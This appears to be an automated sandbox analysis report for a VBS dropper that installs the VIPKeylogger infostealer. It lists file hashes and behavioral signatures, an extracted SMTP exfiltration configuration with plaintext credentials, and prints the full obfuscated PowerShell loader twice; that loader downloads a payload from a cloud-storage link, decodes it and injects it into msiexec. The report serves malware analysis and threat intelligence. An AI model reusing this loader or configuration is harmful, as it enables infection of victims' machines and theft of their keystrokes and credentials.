Analysis
-
max time kernel
107s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
24-10-2024 01:21
Static task
static1
Behavioral task
behavioral1
Sample
31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs
Resource
win10v2004-20241007-en
General
-
Target
31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs
-
Size
530KB
-
MD5
d281f65b5323332d8061568ce377ea0b
-
SHA1
67230ca5abe0f13217a34801be32ff2d573692fa
-
SHA256
31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a
-
SHA512
6a163cb0202bec65ff0d66df700e93ac6c051469a9c5e4d1e68b2be1e7886f70f69a290e8c2b5e39c1d362d2783942c81561685465149cf6ab75c9d606ee2d16
-
SSDEEP
6144:or/7TXNXM0vl4byj8e8j9317d6AMGsP8lLJIRChb6peTUy6TcWFhyuNgtjzfzycT:iSmlcIyYA/sEJQcb0ctuNOLycdeg
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.minhlamcons.com - Port:
587 - Username:
[email protected] - Password:
@Tran@123456 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 3 2528 powershell.exe 5 2528 powershell.exe 8 2092 msiexec.exe 10 2092 msiexec.exe 12 2092 msiexec.exe 14 2092 msiexec.exe 15 2092 msiexec.exe 17 2092 msiexec.exe 19 2092 msiexec.exe 21 2092 msiexec.exe -
Processes:
powershell.exepowershell.exepid process 2528 powershell.exe 2732 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 2092 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 2732 powershell.exe 2092 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepid process 2528 powershell.exe 2732 powershell.exe 2732 powershell.exe 2092 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 2092 msiexec.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2280 wrote to memory of 2528 2280 WScript.exe powershell.exe PID 2280 wrote to memory of 2528 2280 WScript.exe powershell.exe PID 2280 wrote to memory of 2528 2280 WScript.exe powershell.exe PID 2732 wrote to memory of 2092 2732 powershell.exe msiexec.exe PID 2732 wrote to memory of 2092 2732 powershell.exe msiexec.exe PID 2732 wrote to memory of 2092 2732 powershell.exe msiexec.exe PID 2732 wrote to memory of 2092 2732 powershell.exe msiexec.exe PID 2732 wrote to memory of 2092 2732 powershell.exe msiexec.exe PID 2732 wrote to memory of 2092 2732 powershell.exe msiexec.exe PID 2732 wrote to memory of 2092 2732 powershell.exe msiexec.exe PID 2732 wrote to memory of 2092 2732 powershell.exe msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne Preambulation styledom Psorospermial Stemmesamlernes Tchervonets #>;$Stjlendes='Sellouts';<#Lawrencite Unapprehensiveness Fiskeretter shaughn spunsen Kapsejse #>;$Soilless=$Climatometer+$host.UI; function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){$Slidte=$outdrag;$Isklumper+=$Minyae[$outdrag];$Tvangsfodrendes='Scandalmonging';}$Isklumper;}function Restrainedness($Skyggeregeringers){ & ($Conacaste) ($Skyggeregeringers);}$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';$Befattedes+=Forhandlingsresultat 'Ou sm5Cicad.Misfi0Parth .ngra(LyingWunsaliinsatnLa,godFasteoPimp wBrandsSamme Astr.NSplinTOverb Raa a1Pavel0Hjti .Symas0Eskad;Sogne CollW inquiDefinnWh.gg6Raasy4coffi;Skrd. Overx Comm6 Chap4Cho e;Perso strarChattvAblat:Indv 1Nor a3G thr1Flaad.Pickl0,redi)Nybo. MahuaGErgoteVoldgcWith.kViol oTredi/elekt2St bb0fyrst1Deta 0 Byst0For r1 Ba t0Ignic1 Mega Tet FPhiloi udgerFyldiebagepf Haaro Pac,xSonne/Prude1Udrig3Bestt1Anisa.Servi0Sjlek ';$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';$Abonneringens=Forhandlingsresultat ' Troph K altDeclit.eminpV gtmsIndaa:Qu tt/Chi v/OpskrdSyriorirefaiPhysivin,oneBetn . AandgImmesoSvrdlo SogngSterslMiljteHoved. kldecVaneloUnculmSv rp/ KlasuRa llcStill?KlatteStranxYav,lp Luddo Of erfrowat,jerg=I teldCrusho Bel,wN,vinnAeterlJyll oNonteaTugthdStang&Cyn pi D.ugdOxh a=,lerf1RafteTFaldeAViz r1EdgarG LovlpMidchPImp,tnAcerotAar ii ReacmFile J dealrPark _ ApokvDa arhUrovaKSuperONo.suzBetal8HemopWYuckip Untrm khoj1 ,atevP.macCCo.sepBrasnPInterCIndpiZStyr.8Priap2 B,anQ Sove ';$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';$Staatrolds='Trafikministers';$outdragntermural='\Bromley228.Alb';Restrainedness (Forhandlingsresultat '.onfo$DowncgS mlelHovedOTre eBCampaA FjerLpjatt:BowlfAUnva MPerfob halvaFrancsOve,sSHugorAVultudSulphEPreheFFjll UCalipN SmelK ountt Urini PlumoDurumNFejlmRDr psE TrumR ammo= curr$ S ude Se,vN den.Vudrin: DomkaPriorPSamlePR tjrdDoursaOxr it,ndelADuble+Pr co$Com rO Du,bU PaakT FratDP oprR FlanaMalp gInducnOve.ptMiljoEProacRscareM Bambu VlliR NasuA elevLMatti ');Restrainedness (Forhandlingsresultat 'Daarl$Entr.g SorglSlaviOPreloB SpanaViktuLDataa:No eaLAugmeUBerlimSub,apWu.gie HydrNMultih h,ere R.koDM sku= Ta m$OmproabergaBDisadO Kontnb gniN EverESuppoRGeneriViriaNFarvegSjle e SympnIndigS Pte . Fil.SAcci,POr,reLGenstI seistThrop(Respe$MemorFSpherOFrillR A.gdkscam.r .unsoBarram ptimnSucciIAflejnHepargProgeEKebbynDobbesF uit)Medde ');Restrainedness (Forhandlingsresultat ' Ener[Amm nNMagn eM nertHep o.Akto S Overe Bailrrnt eVval ti G,odC PhthE QuinPPseudO SporiLuftanRacebTAnkomMKydmiaFrostNFredsaBare,GPas hesauteR Curr] Rejf:Jackw:DogiesDe unE ForncCircuUTurnbrTeh,rIHarveTBubsrY HephPAp idRTambao odelt pladO Per cTvivlORekomLMarks ,ingd=Atoms Galac[ ErhvNMaoriE .eksTChart.TchtrS Moute Ailwc kovuYds,lrsus eISinatt AfkayS ambPNon rrRefleoBeardTHardwOKaffecDreadOPin aLA ardtDbefoYIslanpPra seInter]Trini:Genop: rkltS verl hovesSigt 1 Kodf2Udbi. ');$Abonneringens=$Lumpenhed[0];$Teaseler=(Forhandlingsresultat 'Parti$Ch maGUd alL indrOLjer B Supea Dor L Heb,:AccussKu tuK Vi iuSanktmRaastRCensoISolf.NSkeergKardaeunde R Scar2Simil1Swaye9tawnr=WightnKethvETekyaW,mbiv-RanklOTrioeB eccejBifo,E.unktc fpatTjeof K nves.romiy R.ucSPrecotSulphe,otioMFlles.Ddsdrn rom E goosTAuti .,tadiwBumpteFal ub A tocUrenlLS umkI Bople ndbrnChokeTO,trv ');Restrainedness ($Teaseler);Restrainedness (Forhandlingsresultat 'F dse$NoncoSOff,nkFjortu.elexmMalapr Co liSk manR,dfogFore eDi,tar Carn2Ventr1 Vice9Ge,ne.Om efHFortreLaaneaTyvted Ha dedipyrrpyrogsponto[Myr,n$ SnvrMPr jeaHcfganNarreupetunt Vacca yphlg HaaniKombi]S nke=Zeb r$Snud BMontreEfterf FromaGldeltInduktFormueRu kadApproeS,llys Nwaf ');$Coolths=Forhandlingsresultat ' Unsu$Gab,oSElfenkRus.au LizamHermarStetiiAgglunSycongunic e Mis r Rn g2 T.od1 M rr9Dandi. snekD aigroE.terwCivilnCirc lCanvaoAfraka TilsdCapesFPi.eli Betrl Ou geLacti(Tredo$ SemiA Min bUn.haodireknFilsynJeopaeFrifir SvoviNordsnE velgFuggyeNebulnhaughsSo,ri,Pendu$LarisE udp xColosaBanglc HjfotCartoiEsseln AtekgBarocnSnegleGua as Skr.sIrrea)Miaou ';$Exactingness=$Ambassadefunktionrer;Restrainedness (Forhandlingsresultat 'Pligh$KompaGMar il KnolO Omgib Midea,ooktlStyrk: lluESomitn elvsTTolleo LiggZItal.o,bseqORacemLSolopOI adoGGasmoYVide =Progn(P epatBl phEAeratS EuryTBaske-L mpfP.ninsaProfatCistuhOpist omm$Seriee AftexAde.saSa,meC anket ElekiTableN IncagDida,NBradyERenses.isses Poly)Th.or ');while (!$Entozoology) {Restrainedness (Forhandlingsresultat 'trich$ pr,ggSuslilAnraaoSkgg,bBastsaSambel Mis : ircuBF.ugalInexod orykPressoTetragErhvetAskileBri t=Torpe$ Ma rtkorporMidw,uHepateS ege ') ;Restrainedness $Coolths;Restrainedness (Forhandlingsresultat 'LivsvsPrecrtPseudABaandrPri utGranu-Phospsselsklt lske harpETube PHar w veld 4 Blan ');Restrainedness (Forhandlingsresultat 'Progr$SplingS anglCo ruo.resubHaugjaNrbillFrels:PentaeEllarn T,opT KirkoDet.lZRot loMiljsofrot,LMalacOSkuldgTrojkyLaven=Erupt(DokstTG.assEUntraSFarveT Oluf-M grap DansA EskaTTenchhUn xt Gun.r$UdskieHand XGstepA P noCPreseTBallvIGlan.nUnwr,GSqu bNSquibeUbetis UdsaS Soci)Gtevi ') ;Restrainedness (Forhandlingsresultat 'Nabol$ScrotgCherrLNonduOG.lebBCoaxbaCytopl Aulo: DesiAdiffeLPrepitScienI bskuNnonusG La,yS nsufm ispe UncoDSk msL TropEave iM A,demGustaeSubtaTbal a=Aflaa$HjemmGZ.oniLKommaOAxmi BGlasfAVs erlFljls:TunedhMye iJAmortoSituarfuldftMeno eDecisTKkkenAEkstrkCre,ckPostveFurroR PettnChu kEtru l+F rar+Ditta%Tvind$muligL OverUBillemneuroPUncaueBarslNSymbiHHollaeSpecidNeger.SubdaCMete.Ons koUAbidin olfrTClock ') ;$Abonneringens=$Lumpenhed[$Altingsmedlemmet];}$Finansforbundet71=329570;$Fordunklet=31115;Restrainedness (Forhandlingsresultat 'Smaa $ o eggSkibilIn tiOUn erBFossiaB rbalSyste: CrainF mesOL,mstNFootlmAdvisE Oar NApostI CornABiblil So.el roncYHeter .edb=Exord S oleGEn soEMo teTAnalo- SkarcTransokalveNDenoutThusnEFrdigNForb tDlgsm ellu$E,aste An.sxKommaAMyte,CDiftoTRestriSpannnUpborGBegrenP polEU godsJoedesStorm ');Restrainedness (Forhandlingsresultat 'Talef$KorpugC,menl DissoFrikab anelaUsneal .eos:TrikiFMinefiA tilnCamb.tHomocfCircooProlorVivarmCopereMu,ketPr,gr Incon=Aaben Whor[A pinSDatabyF ltlsStaunt B oee.kattmFrows.UrlbrC utchoPlayenW rkevK jseeShmucr slastAppli]Sna.s: R.de:UforeFP neurAarsiosloppm fsvaBKnifeaS olasBrasieSta s6sla.k4 IneaSSkakbtFag er Rhi iP.ymonS natgA esl( Ethn$UgeblNScripoHymennsp akmTidyleObs.rnMisr.i.dygta FyrslAntial reaty Lysl)Gadeu ');Restrainedness (Forhandlingsresultat ' Fer $MisgagFort lCoboloDamspBYesseaDvuarLNonco:Erf,rV reagiUnikarFestiGQu,niU Ove,lHoveraBleezr LethIStra AScopo Miswe=Past Knibt[ TankS eriwy Unf.s ushoTSpiree U remPrese.Decc TCospoeRejseXanfrsTG.lle.RivedEBlameNCalaicSi.naO RequDSlotsIA umiNPerifgremed] usar:Hjemm:CrockAVandssPhrygc.croui erreiDis,o.DecimgSummeEAirspTIntonsUnitat De prSpiraiEvapoNRetteg Ext.(Udlov$SorbifdieseI H,aen E clt Un,rFLynn.O naemRLiturmUnacteKvintt.msme)Hl.ft ');Restrainedness (Forhandlingsresultat 'Megal$AdvergInd.rl TranO AddrbMerobA SupeL B gl:EuropkNonacAFedenrCospoDKonstiGasopNFluktaGaugel Fri iOveret Hibee BefrtAkti EAmbilnCivilsBioa =Leget$opkrvvMatteIslageRBicalg SpicUParabLEnkelaInterRE,veriMonopAM,lta.AarsvSFyrafuAktorBTenenS Ka.ktTykmlrTiltaI HjlpnOpslig Unav(Boord$FamilF FibrIGennenDo gtAStereNVas,tS hackfStuepoOrdnur Pr vb SympU restNDistrd icate Invetindkr7 Prer1Hoped,Overs$NukleFKommuOGravhrNsugrdSkyldu ivsfNFritaKUnderLAst oE Phart Tegn) ouc ');Restrainedness $Kardinalitetens;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne Preambulation styledom Psorospermial Stemmesamlernes Tchervonets #>;$Stjlendes='Sellouts';<#Lawrencite Unapprehensiveness Fiskeretter shaughn spunsen Kapsejse #>;$Soilless=$Climatometer+$host.UI; function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){$Slidte=$outdrag;$Isklumper+=$Minyae[$outdrag];$Tvangsfodrendes='Scandalmonging';}$Isklumper;}function Restrainedness($Skyggeregeringers){ & ($Conacaste) ($Skyggeregeringers);}$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';$Befattedes+=Forhandlingsresultat 'Ou sm5Cicad.Misfi0Parth .ngra(LyingWunsaliinsatnLa,godFasteoPimp wBrandsSamme Astr.NSplinTOverb Raa a1Pavel0Hjti .Symas0Eskad;Sogne CollW inquiDefinnWh.gg6Raasy4coffi;Skrd. Overx Comm6 Chap4Cho e;Perso strarChattvAblat:Indv 1Nor a3G thr1Flaad.Pickl0,redi)Nybo. MahuaGErgoteVoldgcWith.kViol oTredi/elekt2St bb0fyrst1Deta 0 Byst0For r1 Ba t0Ignic1 Mega Tet FPhiloi udgerFyldiebagepf Haaro Pac,xSonne/Prude1Udrig3Bestt1Anisa.Servi0Sjlek ';$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';$Abonneringens=Forhandlingsresultat ' Troph K altDeclit.eminpV gtmsIndaa:Qu tt/Chi v/OpskrdSyriorirefaiPhysivin,oneBetn . AandgImmesoSvrdlo SogngSterslMiljteHoved. kldecVaneloUnculmSv rp/ KlasuRa llcStill?KlatteStranxYav,lp Luddo Of erfrowat,jerg=I teldCrusho Bel,wN,vinnAeterlJyll oNonteaTugthdStang&Cyn pi D.ugdOxh a=,lerf1RafteTFaldeAViz r1EdgarG LovlpMidchPImp,tnAcerotAar ii ReacmFile J dealrPark _ ApokvDa arhUrovaKSuperONo.suzBetal8HemopWYuckip Untrm khoj1 ,atevP.macCCo.sepBrasnPInterCIndpiZStyr.8Priap2 B,anQ Sove ';$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';$Staatrolds='Trafikministers';$outdragntermural='\Bromley228.Alb';Restrainedness (Forhandlingsresultat '.onfo$DowncgS mlelHovedOTre eBCampaA FjerLpjatt:BowlfAUnva MPerfob halvaFrancsOve,sSHugorAVultudSulphEPreheFFjll UCalipN SmelK ountt Urini PlumoDurumNFejlmRDr psE TrumR ammo= curr$ S ude Se,vN den.Vudrin: DomkaPriorPSamlePR tjrdDoursaOxr it,ndelADuble+Pr co$Com rO Du,bU PaakT FratDP oprR FlanaMalp gInducnOve.ptMiljoEProacRscareM Bambu VlliR NasuA elevLMatti ');Restrainedness (Forhandlingsresultat 'Daarl$Entr.g SorglSlaviOPreloB SpanaViktuLDataa:No eaLAugmeUBerlimSub,apWu.gie HydrNMultih h,ere R.koDM sku= Ta m$OmproabergaBDisadO Kontnb gniN EverESuppoRGeneriViriaNFarvegSjle e SympnIndigS Pte . Fil.SAcci,POr,reLGenstI seistThrop(Respe$MemorFSpherOFrillR A.gdkscam.r .unsoBarram ptimnSucciIAflejnHepargProgeEKebbynDobbesF uit)Medde ');Restrainedness (Forhandlingsresultat ' Ener[Amm nNMagn eM nertHep o.Akto S Overe Bailrrnt eVval ti G,odC PhthE QuinPPseudO SporiLuftanRacebTAnkomMKydmiaFrostNFredsaBare,GPas hesauteR Curr] Rejf:Jackw:DogiesDe unE ForncCircuUTurnbrTeh,rIHarveTBubsrY HephPAp idRTambao odelt pladO Per cTvivlORekomLMarks ,ingd=Atoms Galac[ ErhvNMaoriE .eksTChart.TchtrS Moute Ailwc kovuYds,lrsus eISinatt AfkayS ambPNon rrRefleoBeardTHardwOKaffecDreadOPin aLA ardtDbefoYIslanpPra seInter]Trini:Genop: rkltS verl hovesSigt 1 Kodf2Udbi. ');$Abonneringens=$Lumpenhed[0];$Teaseler=(Forhandlingsresultat 'Parti$Ch maGUd alL indrOLjer B Supea Dor L Heb,:AccussKu tuK Vi iuSanktmRaastRCensoISolf.NSkeergKardaeunde R Scar2Simil1Swaye9tawnr=WightnKethvETekyaW,mbiv-RanklOTrioeB eccejBifo,E.unktc fpatTjeof K nves.romiy R.ucSPrecotSulphe,otioMFlles.Ddsdrn rom E goosTAuti .,tadiwBumpteFal ub A tocUrenlLS umkI Bople ndbrnChokeTO,trv ');Restrainedness ($Teaseler);Restrainedness (Forhandlingsresultat 'F dse$NoncoSOff,nkFjortu.elexmMalapr Co liSk manR,dfogFore eDi,tar Carn2Ventr1 Vice9Ge,ne.Om efHFortreLaaneaTyvted Ha dedipyrrpyrogsponto[Myr,n$ SnvrMPr jeaHcfganNarreupetunt Vacca yphlg HaaniKombi]S nke=Zeb r$Snud BMontreEfterf FromaGldeltInduktFormueRu kadApproeS,llys Nwaf ');$Coolths=Forhandlingsresultat ' Unsu$Gab,oSElfenkRus.au LizamHermarStetiiAgglunSycongunic e Mis r Rn g2 T.od1 M rr9Dandi. snekD aigroE.terwCivilnCirc lCanvaoAfraka TilsdCapesFPi.eli Betrl Ou geLacti(Tredo$ SemiA Min bUn.haodireknFilsynJeopaeFrifir SvoviNordsnE velgFuggyeNebulnhaughsSo,ri,Pendu$LarisE udp xColosaBanglc HjfotCartoiEsseln AtekgBarocnSnegleGua as Skr.sIrrea)Miaou ';$Exactingness=$Ambassadefunktionrer;Restrainedness (Forhandlingsresultat 'Pligh$KompaGMar il KnolO Omgib Midea,ooktlStyrk: lluESomitn elvsTTolleo LiggZItal.o,bseqORacemLSolopOI adoGGasmoYVide =Progn(P epatBl phEAeratS EuryTBaske-L mpfP.ninsaProfatCistuhOpist omm$Seriee AftexAde.saSa,meC anket ElekiTableN IncagDida,NBradyERenses.isses Poly)Th.or ');while (!$Entozoology) {Restrainedness (Forhandlingsresultat 'trich$ pr,ggSuslilAnraaoSkgg,bBastsaSambel Mis : ircuBF.ugalInexod orykPressoTetragErhvetAskileBri t=Torpe$ Ma rtkorporMidw,uHepateS ege ') ;Restrainedness $Coolths;Restrainedness (Forhandlingsresultat 'LivsvsPrecrtPseudABaandrPri utGranu-Phospsselsklt lske harpETube PHar w veld 4 Blan ');Restrainedness (Forhandlingsresultat 'Progr$SplingS anglCo ruo.resubHaugjaNrbillFrels:PentaeEllarn T,opT KirkoDet.lZRot loMiljsofrot,LMalacOSkuldgTrojkyLaven=Erupt(DokstTG.assEUntraSFarveT Oluf-M grap DansA EskaTTenchhUn xt Gun.r$UdskieHand XGstepA P noCPreseTBallvIGlan.nUnwr,GSqu bNSquibeUbetis UdsaS Soci)Gtevi ') ;Restrainedness (Forhandlingsresultat 'Nabol$ScrotgCherrLNonduOG.lebBCoaxbaCytopl Aulo: DesiAdiffeLPrepitScienI bskuNnonusG La,yS nsufm ispe UncoDSk msL TropEave iM A,demGustaeSubtaTbal a=Aflaa$HjemmGZ.oniLKommaOAxmi BGlasfAVs erlFljls:TunedhMye iJAmortoSituarfuldftMeno eDecisTKkkenAEkstrkCre,ckPostveFurroR PettnChu kEtru l+F rar+Ditta%Tvind$muligL OverUBillemneuroPUncaueBarslNSymbiHHollaeSpecidNeger.SubdaCMete.Ons koUAbidin olfrTClock ') ;$Abonneringens=$Lumpenhed[$Altingsmedlemmet];}$Finansforbundet71=329570;$Fordunklet=31115;Restrainedness (Forhandlingsresultat 'Smaa $ o eggSkibilIn tiOUn erBFossiaB rbalSyste: CrainF mesOL,mstNFootlmAdvisE Oar NApostI CornABiblil So.el roncYHeter .edb=Exord S oleGEn soEMo teTAnalo- SkarcTransokalveNDenoutThusnEFrdigNForb tDlgsm ellu$E,aste An.sxKommaAMyte,CDiftoTRestriSpannnUpborGBegrenP polEU godsJoedesStorm ');Restrainedness (Forhandlingsresultat 'Talef$KorpugC,menl DissoFrikab anelaUsneal .eos:TrikiFMinefiA tilnCamb.tHomocfCircooProlorVivarmCopereMu,ketPr,gr Incon=Aaben Whor[A pinSDatabyF ltlsStaunt B oee.kattmFrows.UrlbrC utchoPlayenW rkevK jseeShmucr slastAppli]Sna.s: R.de:UforeFP neurAarsiosloppm fsvaBKnifeaS olasBrasieSta s6sla.k4 IneaSSkakbtFag er Rhi iP.ymonS natgA esl( Ethn$UgeblNScripoHymennsp akmTidyleObs.rnMisr.i.dygta FyrslAntial reaty Lysl)Gadeu ');Restrainedness (Forhandlingsresultat ' Fer $MisgagFort lCoboloDamspBYesseaDvuarLNonco:Erf,rV reagiUnikarFestiGQu,niU Ove,lHoveraBleezr LethIStra AScopo Miswe=Past Knibt[ TankS eriwy Unf.s ushoTSpiree U remPrese.Decc TCospoeRejseXanfrsTG.lle.RivedEBlameNCalaicSi.naO RequDSlotsIA umiNPerifgremed] usar:Hjemm:CrockAVandssPhrygc.croui erreiDis,o.DecimgSummeEAirspTIntonsUnitat De prSpiraiEvapoNRetteg Ext.(Udlov$SorbifdieseI H,aen E clt Un,rFLynn.O naemRLiturmUnacteKvintt.msme)Hl.ft ');Restrainedness (Forhandlingsresultat 'Megal$AdvergInd.rl TranO AddrbMerobA SupeL B gl:EuropkNonacAFedenrCospoDKonstiGasopNFluktaGaugel Fri iOveret Hibee BefrtAkti EAmbilnCivilsBioa =Leget$opkrvvMatteIslageRBicalg SpicUParabLEnkelaInterRE,veriMonopAM,lta.AarsvSFyrafuAktorBTenenS Ka.ktTykmlrTiltaI HjlpnOpslig Unav(Boord$FamilF FibrIGennenDo gtAStereNVas,tS hackfStuepoOrdnur Pr vb SympU restNDistrd icate Invetindkr7 Prer1Hoped,Overs$NukleFKommuOGravhrNsugrdSkyldu ivsfNFritaKUnderLAst oE Phart Tegn) ouc ');Restrainedness $Kardinalitetens;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
469KB
MD5598347a0bcbbbba59adef833a5b27d72
SHA1149039d2fea4a3a940884c9eb8689d59a957a4a2
SHA256ed6dd1b56c22e70a8f7ed2582803ce7731ab5d3210a065d26d34e2ac78e5ef6b
SHA512ae6d040c03aef912f53a29596d25be5832d7faa42ba41b64c287a633f483dd09f26818687fcc5155b1873433a1482cd53357b5b414e6dc4652ae600c3739b236
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VT81W65D14Y6LC4LW84X.temp
Filesize7KB
MD5d06b845bcd725bafe79916221cf6142b
SHA12bb84d812c0e51dd8b64f73867f6d739495ff036
SHA256dd852e17dd21105b245987d45510642db7fd07c98124ef3ba67cc35ae3a123d2
SHA512feb696650277cff90668ef61bfb2f44145c4ee2b0da58ec61df75aa8c08aca60b4e5a32cf62d5548d0b076f86f06583386c7a1c31f41fb2319fd305570e41570